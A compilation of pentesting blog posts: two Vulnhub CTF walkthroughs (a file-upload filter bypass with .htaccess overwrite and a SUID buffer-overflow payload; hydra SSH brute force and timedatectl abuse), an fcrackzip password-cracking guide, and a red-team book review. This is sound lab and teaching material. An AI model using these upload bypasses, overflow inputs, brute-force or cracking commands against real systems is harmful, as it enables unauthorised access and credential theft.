CTF KFIOFan: 2 Vulnhub Walkthrough


Today we are going to take on a new challenge, KFIOFan2. The credit for making this VM goes to “Khaos Farbauti Ibn Oblivion”. It is a boot2root challenge in which we have to root the server to complete it. You can download this VM here.

Security Level: Beginner
Penetration Methodology:
Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Enumerating ftp services
Exploitation
·        Uploading php shell to get ssh key
Privilege Escalation
·        Buffer Overflow to get sudo rights


Walkthrough:
Scanning:
First things first: scan the vulnerable machine using nmap.

nmap -p-  -A 192.168.1.33

Here we found that the only open port is 26921.

Let’s take a look at what the FTP service has to offer. The service banner gave us a message:
“Salut Alice ! Suite a l'attaque sur notre precedent serveur, j'en prepare un nouveau qui sera bien plus securise ! C'est en travaux pour l'instant donc s'il te plait ne touche a rien pour l'instant... Bob”
Which translates to
“Hi Alice! Following the attack on our previous server, I prepare a new one that will be much more secure! It is under construction for now so please do not touch anything for now ... Bob”
Anonymous login was allowed. After logging in, we found four images and a directory named `serrure`. We downloaded the images and checked the directory, but found nothing in it.

Having gathered nothing but the four images, we tried to decipher the hint behind them, first by looking for any kind of steganographic content, then by another method: we combined the images together and found that the catch was very simple. In the centre of the combined image was the name of a file, “cle.txt”.

We tried to find this file but could not locate it anywhere, so we tried something slightly different: we created a file with dummy content and put it on the target system through FTP.

After putting the file in the serrure directory, we scanned the target system again. The cle.txt file appears to have worked as a key that unlocked another port, 26980, running an HTTP service:
nmap -p- -A 192.168.1.33

Now that we had found another port, we tried to enumerate the website, but the welcome message looked like this:
Tout ce qui est, est père du mensonge et fils du néant
Which translates into
All that is, is father of lies and sons of nothingness

While analysing the page source of the webpage, we found a comment which translates into:
<!-- Test presence cle.txt file: OK -->
<!-- Test content cle.txt file: Error -->
This indicates that the content of the cle.txt file needs to be changed.

Alongside this, we tried to get more details about the target machine and found a directory named uploads, but with no content.

To put the correct content in the cle.txt file, we looked for the meaning of the hint. After some research, we found an article written by the author of this lab, in which the hint turned out to be a description of the author’s nickname, i.e. Khaos Farbauti Ibn Oblivion.

We used this name as the content of cle.txt and replaced the file in the serrure directory through FTP:
echo "Khaos Farbauti Ibn Oblivion" > cle.txt
ftp 192.168.1.33 26921
cd serrure
delete cle.txt
put cle.txt


Now let’s check the webpage again. This time we found a file upload module in place; it looks like the content of the cle.txt file was being used to change the behaviour of the webpage. Now all we need to do is upload a shell. First we tried to upload a txt file, and it was uploaded without trouble.

Next we tried uploading a PHP shell, but it was blocked.

To bypass the filter we tried to upload a .php5 shell and succeeded.
To verify that our shell was uploaded, we checked the uploads directory and found our file there.
We then tried to execute the shell but failed. After some attempts we suspected there might be a .htaccess file blocking execution of PHP applications, so to override it we needed to overwrite the existing one: we created a blank .htaccess file and uploaded that.
As we were able to upload the .htaccess file, we tried to use the uploaded shell to run system commands, and it worked.


After some searching we found an SSH key.

Now all we needed was an SSH port to connect to. We ran the nmap scan again and this time found an SSH port on 26922:
nmap -p- -A 192.168.1.33

Now we have an SSH port and an SSH key; let’s combine them and get an SSH connection. We saved the SSH key into a file named id_rsa, gave it 0600 permissions and used that key for the connection. Once connected, we looked for all files with the SUID bit set and found one named test:
chmod 0600 id_rsa
ssh bob@192.168.1.33 -p 26922 -i id_rsa
find / -perm -u=s -type f 2>/dev/null

When we tried to execute the file, it asked us for a password, which we did not have. We checked the strings in the file using the strings command and found some interesting things.
strings test
First, there is a system function in use, meaning a system command is being executed.
Second, there is the command “touch /root/authorize_bob”, indicating that this is the command we want to be executed.
Third, there is a string “aliceestnulle” right below the password prompt “Mot de passe”.


We ran the file again with the password we had found and got a message.

As we were not able to get anything even after entering the correct password, we tried to get more details from gdb:
gdb test
set disassembly-flavor intel
disassemble main
start

We started the execution of the program using the start command. When the program asked for a password, we looked for a buffer overflow vulnerability by creating an input string of length 50 using pattern_create.rb from the metasploit-framework:
cd /usr/share/metasploit-framework/tools/exploit
./pattern_create.rb -l 50
After supplying the input we found that, beyond a certain length, our input ends up on the executable stack.

Before going into the various ways of exploiting the buffer overflow, we went back to our previous findings to check for other hints to follow. Fortunately, in the strings output, right above the touch command, there was a string with the content
lancement debug
which translates to
launch debug
When we checked the debug function, we found that a system function is executed inside it:
disassemble debug

Next we were left with the attempt to execute the debug function, so we took the length of the string that caused the buffer overflow and replaced the characters that ended up on the executable stack with the address of the debug function:
python -c 'print ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6"+"\x20\x48\x55\x55\x55\x55")' | ./test
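The weakness in the SUID binary is an unbounded read of the password into a fixed-size stack buffer, which is why a long enough pattern reaches the saved return address. The following is an added example, not the challenge's own source (whose buffer size is not on the page), showing that pattern beside a hardened reader that refuses over-long input and compares the password without bailing out early; PASS_MAX and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the real binary's stack layout is not on the page. */
#define PASS_MAX 32

/* The shape of the bug in the walkthrough's "test" binary (illustrative only):
 * an unbounded copy lets input longer than buf run past it into the saved
 * frame data, so a long pattern changes where the function returns to. */
int check_password_unsafe(const char *input) {
    char buf[PASS_MAX];
    strcpy(buf, input);                      /* BUG: no length check */
    return strcmp(buf, "aliceestnulle") == 0;
}

/* Hardened reader: never writes past sz bytes and rejects a line that did
 * not fit instead of silently truncating it. Returns 0 on success, -1 on
 * EOF or on an over-long line. */
int read_password_line(FILE *in, char *buf, size_t sz) {
    if (sz == 0 || fgets(buf, (int)sz, in) == NULL) return -1;
    char *nl = strchr(buf, '\n');
    if (nl == NULL) {
        int c = fgetc(in);
        if (c == EOF) return 0;              /* final line without newline, still fits */
        while (c != EOF && c != '\n') c = fgetc(in);   /* drain the over-long line */
        buf[0] = '\0';
        return -1;
    }
    *nl = '\0';
    return 0;
}

/* Compare against the expected password without stopping at the first
 * mismatching byte, so response time does not reveal how much matched. */
int check_password(const char *input) {
    static const char expected[] = "aliceestnulle";
    size_t n = sizeof expected - 1;
    if (strlen(input) != n) return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++) diff |= (unsigned char)(input[i] ^ expected[i]);
    return diff == 0;
}

int main(void) {
    char buf[PASS_MAX];
    printf("Mot de passe: ");
    fflush(stdout);
    if (read_password_line(stdin, buf, sizeof buf) != 0 || !check_password(buf)) {
        puts("refused");
        return 1;
    }
    puts("ok");
    return 0;
}
```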

After running the same input several times, we logged out of the SSH session, reconnected, tried the sudo command, and it worked:
ssh bob@192.168.1.33 -p 26922 -i id_rsa
sudo su
Let’s capture the flag and finish the CTF:
cd /root
cat flag.txt

Comprehensive Guide on fcrackzip Tool


In this article, we are going to discuss fcrackzip, a third-party tool for cracking the passwords of zip files. It is a good tool, as it searches a zip file for encrypted entries and tries to guess their password. Here we discuss each option available in fcrackzip so that we can use the tool to its full potential.
There are many cases where an individual types an incorrect password, and unzip reacts quickly to it: it does not even need to decrypt the whole file. While the encryption algorithm used by zip is relatively secure, the format provides hooks for very fast password checking directly in the zip file, and fcrackzip takes advantage of them. Understanding these is crucial to zip password cracking.
The first twelve bytes of the encrypted data are decrypted first. Depending on the version of zip used to encrypt the file, the first ten or eleven bytes are random, followed by one or two bytes whose values are stored elsewhere in the zip file, i.e. are known beforehand. If those last bytes do not match, the password is known to be wrong. The only way to determine whether the password is actually correct is to unzip the file and compare the uncompressed length and CRCs.
Earlier versions of pkzip stored two known bytes, so the error rate was roughly 1/2^16 = 0.01%. pkware ‘improved’ the security of their format by only including one byte, so the probability of a false password is now raised to 0.4%. Unfortunately, there is no real way to distinguish the one-byte format from the two-byte one, so we have to be conservative.
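To see what the known-byte check means in practice, here is an added example (not part of fcrackzip itself) that counts the candidates a brute-force run with a given -c charset and -l length range has to try, and estimates how many wrong passwords will slip through the one-byte and two-byte checks as false positives, which is exactly what the -u option is there to remove. Only the a, A and 1 charset classes are modelled, and the function names are assumptions.

```c
#include <stdio.h>
#include <limits.h>

/* Number of characters in an fcrackzip -c spec. Only the a (lowercase),
 * A (uppercase) and 1 (digit) classes are modelled; anything else returns -1. */
int charset_size(const char *spec) {
    int size = 0;
    for (const char *p = spec; *p; p++) {
        switch (*p) {
        case 'a': size += 26; break;
        case 'A': size += 26; break;
        case '1': size += 10; break;
        default:  return -1;             /* '!' and ':...' classes not modelled */
        }
    }
    return size;
}

/* Candidates a brute-force run (-b -c SPEC -l MIN-MAX) has to try:
 * the sum over each length of charset_size^length. Returns 0 on bad
 * input or if the count would overflow. */
unsigned long long keyspace_size(const char *spec, int min_len, int max_len) {
    int n = charset_size(spec);
    if (n <= 0 || min_len < 1 || max_len < min_len) return 0;
    unsigned long long total = 0, per_len = 1;
    for (int len = 1; len <= max_len; len++) {
        if (per_len > ULLONG_MAX / (unsigned long long)n) return 0;
        per_len *= (unsigned long long)n;
        if (len >= min_len) total += per_len;
    }
    return total;
}

/* Wrong passwords that still pass the known-byte check: each known byte
 * rejects all but 1/256 of them, so two known bytes leave 1/65536. */
double expected_false_positives(unsigned long long candidates, int known_bytes) {
    double divisor = 1.0;
    for (int i = 0; i < known_bytes; i++) divisor *= 256.0;
    return (double)candidates / divisor;
}

int main(void) {
    /* The lowercase, length 1-3 run used later on this page ("-c 'a' -l 1-3"). */
    unsigned long long n = keyspace_size("a", 1, 3);
    printf("candidates tried: %llu\n", n);
    printf("false positives with 1 known byte:  %.1f\n", expected_false_positives(n, 1));
    printf("false positives with 2 known bytes: %.3f\n", expected_false_positives(n, 2));
    return 0;
}
```

With one known byte, even this tiny keyspace yields about 71 candidates that look correct, which is why the bare -b output lists many "possible" passwords and -u is needed to confirm the real one.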

Introduction to fcrackzip
We frequently use zipped files because of their small size and encryption. These zipped files come with password protection, which maintains the security of the files.
When you have lost the password and the problem arises of how to recover it, fcrackzip comes to the rescue and provides a way back to your documents. Cracking a protected zip file is simple with fcrackzip, which is available under Linux.
fcrackzip is a free, fast zip password cracker written by Marc Lehmann <pcg@goof.com>. It was not meant to be the fastest zip cracker available, but to be a portable, free, and still fast zip password cracker.


Multiple feature of fcrackzip
As we are using Kali Linux, the fcrackzip tool is installed by default; we just need to open the terminal and type “fcrackzip --help”, and its help text will greet you.
·         -b: use brute-force mode.
·         -D: use dictionary mode.
·         -B: execute a small benchmark.
·         -c: use characters from the given charset.
·         -h: show the help message.
·         --version: show the version of this program.
·         -V: validate or check the algorithm.
·         -v: verbose mode.
·         -p: use a string as the initial password (in dictionary mode, the file to read passwords from).
·         -l: specify the password length (minimum-maximum).
·         -u: use unzip to weed out wrong passwords.
·         -m: specify the method number.





Creating a password protected zip file
First, we have to create a password-protected zip file. For that we select the file we want to secure and run the following command:
Syntax: zip --password <password> <archive.zip> <file>



Cracking the password of zip file
fcrackzip is a very effective tool and also quite easy to use for a brute-force attack on a zip file; for that we use different options. We use (-b), which tells it to brute-force the zip file, and (-c), which defines the charset to brute-force with.

fcrackzip -b -c 'a' file.zip



In the above result we see all the candidate passwords the attack found. If we want to weed out the wrong ones, we can use (-u), which lets only the correct result through.

fcrackzip -b -c 'a' -u file.zip





Verbose mode
In fcrackzip, verbose mode is enabled with the (-v) parameter and generates extended information. In our case it gives us information about the file inside the password-protected zip, like its size and name, and the current candidate being applied to the zip file.

fcrackzip -b -v -c 'a' -u file.zip





Cracking numeric password with specific length
For that we created a numeric password-protected zip file with the same command we used earlier to create a password-protected zip file.
In this case we use two parameters: (-c '1'), which we used earlier for a different purpose but now use to apply the numeric charset, and (-l), which specifies the length of the password (minimum length - maximum length).

zip --password 123 raj.zip user.txt
fcrackzip -b -v -c '1' -l 1-3 -u raj.zip




Providing intial password
With this parameter we set the initial (starting) password for the brute-force search to the given string; in dictionary mode the same parameter names the file from which passwords are read.
fcrackzip -b -v -c 'a' -p ignite -u file.zip






Dictionary Traversing
In this mode fcrackzip reads the passwords from a file that we supply; the file must contain one password per line and should be alphabetically sorted so that fcrackzip works as intended.
fcrackzip -D -p rockyou.txt file.zip





Different method
With this parameter we use a method other than the default for the cracking process. The switch --help prints a list of available methods, and we can use --benchmark to see which method is best for our machine; the chosen method number is then used instead of the default cracking method.


fcrackzip -b -v -c 'a' -m 1 -u file.zip





Benchmark
This parameter helps us find out which fcrackzip method is most effective on our machine by calculating a benchmark score.
fcrackzip -B


Hands-on Red Team Tactics - A Red Team Edition book


Recently I had the pleasure and honour of being asked to add my review of the Hands-On Red Team Tactics book. As this book was published in September 2018, it covers the latest evasion and attack techniques.

I appreciate the great effort put in by “Himanshu Sharma”, an Indian ethical hacker who has already achieved fame for finding security loopholes and vulnerabilities in Apple, Google, Microsoft, Facebook, Adobe, Uber, AT&T, Avira, and many more, with hall of fame listings, and by “Harpreet Singh”, who has more than 5 years of experience in the field of ethical hacking, penetration testing, and red teaming. Harpreet is an Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP).

Special thanks to “Raj Chandel” and “Aarti Singh” for helping me comprehend the concept of red team operations in the most effective way.

While reading this book I found that it covers some very advanced and useful tools for red team practice that I generally use while performing red team operations; therefore I feel this book is a valuable resource for those who wish to move beyond traditional VAPT.

Book Overview

Red Teaming is used to enhance security by performing simulated attacks on the organization in order to detect network and system vulnerabilities. Hands-On Red Team Tactics starts with an overview of pentesting and Red Teaming, before introducing a few of the latest pentesting tools. You will then move on to exploring Metasploit and getting to grips with Armitage. Once you have studied the basics, you will understand Cobalt Strike basics and usage, and how to set up a Cobalt Strike team server.

You will discover some common, lesser-known techniques for pivoting and how to pivot over SSH, before using Cobalt Strike to pivot. This comprehensive guide demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to command-and-control (C2) servers and redirectors. All this will help you achieve persistence using Beacons and data exfiltration, and will also give you the chance to run through the methodology for using red team tools like Empire during a red team activity on Active Directory and a Domain Controller.


By the end of the book, you will have learned advanced penetration testing tools, techniques to get reverse shells over encrypted channels, and processes for post-exploitation. In addition, you will explore frameworks such as Empire, which include maintaining persistent access, staying untraceable, and getting reverse connections over different covert C2 channels.




Key Features
·        Target a complex enterprise environment in a red team activity
·        Detect threats and respond to them with a real-world cyber-attack simulation
·        Explore advanced penetration testing tools and techniques

Who this book is for
Hands-On Red Team Tactics is for you if you are an IT professional, pentester, security consultant, or ethical hacker interested in the IT security domain and want to go beyond penetration testing. Prior knowledge of penetration testing is beneficial.

What you will learn
·        Get started with red team engagements using less common methods
·        Explore a variety of post-exploitation techniques
·        Get acquainted with all the tools and frameworks included in the Metasploit framework
·        Discover how you can gain stealth access to systems via red teaming
·        Understand the concept of redirectors to add further anonymity to your C2
·        Work through a range of uncommon data exfiltration techniques


What this book covers

Chapter 1: Red-Teaming and Pentesting, helps you understand the different pentesting standards followed across the industry, and goes through the seven phases of the PTES standard in detail.

Chapter 2: Pentesting 2018, introduces you to MSF Payload Creator (MSFPC). We will also look at the use of the resource files that MSFPC generates alongside the payload file.

Chapter 3: Foreplay – Metasploit Basics, teaches you about team server and the Armitage client, including the setup and usage of Armitage.

Chapter 4: Getting Started with Cobalt Strike, starts by exploring the red-team exercise as well as the concept of the cyber kill chain, which can be used for an attack plan. The chapter then introduces you to Cobalt Strike, the tool that is used for red-team operations.

Chapter 5: ./ReverseShell, explores what a reverse connection and a reverse shell connection are, using various tools. Furthermore, we will try different payloads to get reverse shell connections using Metasploit.

Chapter 6: Pivoting, dives into port forwarding and its uses. We will also learn about pivoting and its uses, followed by methods of port forwarding via SSH.

Chapter 7: Age of Empire – The beginning, introduces you to Empire and its fundamentals. We will also cover Empire's basic usage and the post-exploitation basics for Windows, Linux and OSX.

Chapter 8: Age of Empire – Owning Domain Controllers, delves into some more advanced uses of the Empire tool to get access to the Domain Controller.

Chapter 9: Cobalt Strike – Red Team Operations, teaches you about the listener module of Cobalt Strike along with its type and usage.

Chapter 10: C2 – Master of Puppets, provides an introduction to command and control (C2) servers and discusses how they are used in a red team operation.

Chapter 11: Obfuscate C2s – Introducing Redirectors, introduces you to redirectors and the reason why obfuscating C2s is required. It also covers how to obfuscate C2s in a secure manner so that our C2s are protected from detection by the blue team.

Chapter 12: Achieving Persistence, dives into achieving persistence using Armitage's inbuilt exploit modules, then we will learn how to do the same via Empire on Windows, Linux, and macOS machines.

Chapter 13: Data Exfiltration, discusses some basic ways of transferring data using simple tools like Netcat, OpenSSL and PowerShell. Next, it moves on to transforming the data using text-based steganography to avoid detection, as well as the usage of the CloakifyFactory tool.


This book is available on Amazon; you can buy it from the link below:
https://www.amazon.com/Hands-Red-Team-Tactics-operations-ebook/dp/B07GVPGFTL/ref=sr_1_1?keywords=Hands-on+Red+Team+Tactics&qid=1566357945&s=audible&sr=8-1

Broken: Gallery Vulnhub Walkthrough

We have another CTF challenge for CTF players, named “Broken”, and it can be downloaded from Vulnhub here. The credit goes to “Avraham Cohen” for designing this VM for beginners. This is a Linux-based CTF challenge where you can use your basic pentesting skills to compromise the VM and escalate to a root shell.

Penetration Testing Methodologies
·         Netdiscover
·         Nmap
Enumeration
Exploiting
·         Brute Force
·         Post enumeration
Privilege escalation
·         Abusing sudo rights

Walkthrough

Network Scanning

Let’s begin with a network scan using netdiscover to identify the host machine’s IP.
netdiscover
This gave 192.168.1.107 as the host IP; now we move on to a port and service scan.


For a deep network scan we always prefer the nmap aggressive scan, and this time we go with the same approach, running the command below to enumerate running services and open ports.

nmap -A 192.168.1.107

From its scan result we found that ports 22 and 80 are open, for the SSH and HTTP services respectively.



Enumeration

For more detail we need to start enumeration against the host machine, so we navigate to the web browser to explore the HTTP service.
We obtained some files, as shown in the image below. We downloaded and explored each file but did not find any remarkable clue for a further move.


Considering that the above file names could be helpful in generating a wordlist for a brute-force attack, I saved the file names and all relevant hints in two text files, named “user” and “pwd”, as shown below.


Exploiting
Now it was time to use hydra for a brute-force attack on port 22 for SSH login, so we ran the command below on our local machine.
hydra -L user -P pwd 192.168.1.107 ssh
Great!! It works, and we have broken:broken as the SSH login credentials.


With the help of the above credentials, we logged in and got a low-privilege shell as user broken, and noticed that he has sudo rights to execute timedatectl and reboot with root privileges.


Privilege Escalation
To escalate to root, we went for post enumeration and looked at the .bash_history file.



In this file we noticed some interesting actions performed by the author, pointing towards a file named “password-policy.sh” inside /etc/init.d, a command to set the date and time using “timedatectl”, and more.


We quickly opened the password-policy.sh that exists inside /etc/init.d and found a command that changes the root password to “TodayIsAgoodDay” when a specific condition, the date and time, is met.


So we ran the timedatectl command with sudo to set the date and time, and then rebooted the machine, as in the commands below:
sudo timedatectl set-time '2015-11-20 16:14:50'
sudo /sbin/reboot


Now we connect to the host machine via SSH again as before and try to obtain a root shell by switching user. As we had hoped, the password had been changed to “TodayIsAgoodDay”, so we used it to log in as root.
Yes, it works, and we have successfully obtained the root shell; with this the task is finished.